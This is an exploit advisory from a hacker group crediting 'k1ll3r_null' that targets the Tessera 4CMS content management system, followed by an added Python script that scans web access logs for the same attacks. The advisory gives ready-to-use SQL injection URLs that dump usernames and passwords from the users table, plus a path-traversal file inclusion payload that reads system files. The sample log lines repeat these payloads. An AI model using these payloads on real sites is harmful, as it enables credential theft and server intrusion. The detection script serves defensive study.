Tessera 4CMS suffers from remote SQL injection and local file inclusion vulnerabilities.
e6aae8d3dbbd74d2a6ab420235c945486296f9a7ae556015eebb25bb3b2e8e10
###############################################################
#                                                             #
#     Tessera 4CMS multiple vulnerabilities (SQLi + LFI)      #
#                                                             #
#                   xploited by k1ll3r_null                   #
#                                                             #
#               contact: k1ll3r.null@gmail.com                #
###############################################################
+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------
Vulnerable product : Tessera 4CMS (all versions)
Read Product info : http://www.tessera.gr/frontend/article.php?aid=9&cid=5
-------------------------------------------------------------------------------------------------------------------------
SQL injection vulnerabilities :
vulnerable file : article.php // vulnerable parameter: "aid" ($_GET)
vulnerable file : articles.php // vulnerable parameter: "cid" ($_GET)
Exploit :
1) http://www.site.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
2) http://www.site.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
LOGIN:
http://site.com/admin/login.php
-------------------------------------------------------------------------------------------------------------------------
LFI vulnerability :
vulnerable file : index.php // vulnerable parameter: "chlang" ($_GET)
Exploit :
http://www.site.com/frontend/index.php?chlang=../../../../etc/services%00
--------------------------------------------------------------------------------------------------------------------------
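Detection example (added here, not part of the original advisory or of Tessera 4CMS): a Python check over web access-log lines that flags non-numeric "aid"/"cid" values and "chlang" values carrying path traversal or a NUL byte. The log format, the sample lines and the assumption that legitimate language codes are short alphabetic tokens are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters named in the advisory.
NUMERIC_PARAMS = {"article.php": "aid", "articles.php": "cid"}
LANG_SCRIPT, LANG_PARAM = "index.php", "chlang"
# Assumption: legitimate language codes are short alphabetic tokens ("en", "el").
LANG_RE = re.compile(r"[A-Za-z]{2,5}")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in common log format (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /frontend/article.php?aid=9&cid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /frontend/article.php?aid=-9999+union+all+select+1,2 HTTP/1.1" 200 4312',
    '198.51.100.7 - - [01/Jan/2024:10:01:05 +0000] "GET /frontend/articles.php?cid=-999+union+all+select+1,2 HTTP/1.1" 200 4298',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /frontend/index.php?chlang=en HTTP/1.1" 200 8800',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /frontend/index.php?chlang=../../../../etc/services%00 HTTP/1.1" 200 19183',
]

def classify(line):
    """Return a finding string for one access-log line, or None if it looks clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values (%00 -> NUL) and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    name = NUMERIC_PARAMS.get(script)
    for value in params.get(name, []):
        # Article and category ids should be plain unsigned integers.
        if not re.fullmatch(r"\d{1,10}", value):
            return f"sqli-suspect {script}?{name}"
    if script == LANG_SCRIPT:
        for value in params.get(LANG_PARAM, []):
            if "\x00" in value or ".." in value or "/" in value or "\\" in value:
                return f"lfi-suspect {script}?{LANG_PARAM}"
            if not LANG_RE.fullmatch(value):
                return f"unexpected-value {script}?{LANG_PARAM}"
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, finding) for n, finding in hits if finding]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

The same allow-list logic (integer-only ids, fixed set of language codes) is what the application itself should enforce before the values reach a query or an include path.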